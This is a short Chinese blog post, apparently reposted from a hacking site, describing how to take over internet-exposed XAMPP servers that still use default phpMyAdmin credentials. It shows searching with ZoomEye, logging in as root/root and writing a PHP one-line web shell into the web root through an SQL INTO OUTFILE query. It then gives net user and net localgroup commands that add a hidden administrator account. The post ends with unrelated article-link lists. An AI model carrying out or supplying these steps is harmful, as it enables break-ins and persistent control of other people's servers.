xampp默认配置拿shell

  首先我们先来科普一下xampp(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动即可。 然后在安装xampp的过程中 很多网站管理员对于mysql数据库密码 都会直接 默认  所以 就照成了这个漏洞的产生

好了 废话不多说 我们直接上神器钟馗之眼 server-status – server-info – phpmyadmin 账号密码: root/root port:80

  如图找到一个网站 进去 初始的phpinfo 箭头指的是phpmyadmin的登陆地址

我们记下网站根目录C:/Program Files (x86)/xampp/xampps/htdocs

  点进去之后我们输入 默认的用户名和密码 root root

  进去之后我们呢输入sql语句 select ‘php一句话’ into outfile ‘C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php’   写入一句话

  菜刀连之  然后我们在说一下提权

  (1)首先输入命令添加用户:

  net user test01 Mgs?1234567890 /add

  (2)将普通用户加入到超级管理组administrators

  然后输入net localgroup administrators mgsrc1 /add

(ps:在提权的时候 也走了很多弯路 这台服务器 的密码策略没关闭 所以 密码组合必须为一个大写字母 加一个符号然后加数字  而且 这台服务器 密码位数不能超过14位 不然就无响应)

文章转发地址:http://www.hackdig.com/04/hack-34524.htm

最新文章

  1. 横向滑动的GridView
  2. 向NFV过渡 这三个坑我替你趟了
  3. 【BZOJ 1492】【NOI 2007】货币兑换Cash
  4. Jquery DOM元素的方法
  5. iOS 开发 - 改善APP的流畅度 (绘制股票行情)
  6. cocos代码研究(1)sprite学习笔记
  7. jQuery控制CSS样式
  8. MS Sqlserver 备份数据库SQL
  9. TRF7960天线参数试验
  10. DFBle.swift
  11. tomcat使用说明
  12. Bootstrap Collapse使用
  13. Node.js学习笔记3(快速入门)
  14. 数据库读写分离Amoeba
  15. redis3.2新功能--GEO地理位置命令介绍
  16. MySQL中的内置系统函数
  17. pilicat-dfs 霹雳猫-分布式文件系统
  18. noip模拟【ping】
  19. ubuntu18.04配置nvidia docker和远程连接ssh+远程桌面连接(二)
  20. 【CNN】卷积神经网络

热门文章

  1. HDU 1532 Drainage Ditches (网络流)
  2. 使用Axis2方式发布webService的三种方式
  3. Elasticsearch检索分类详解
  4. ASP.NET Core分布式项目实战
  5. 英语学习Start
  6. EIP权限工作流平台-移动端
  7. git从远程仓库gitLab上拉取指定分支到本地仓库
  8. ps色彩混合
  9. sticky,粘性定位
  10. InstelliJ IDEA使用js+servlet+ajax入门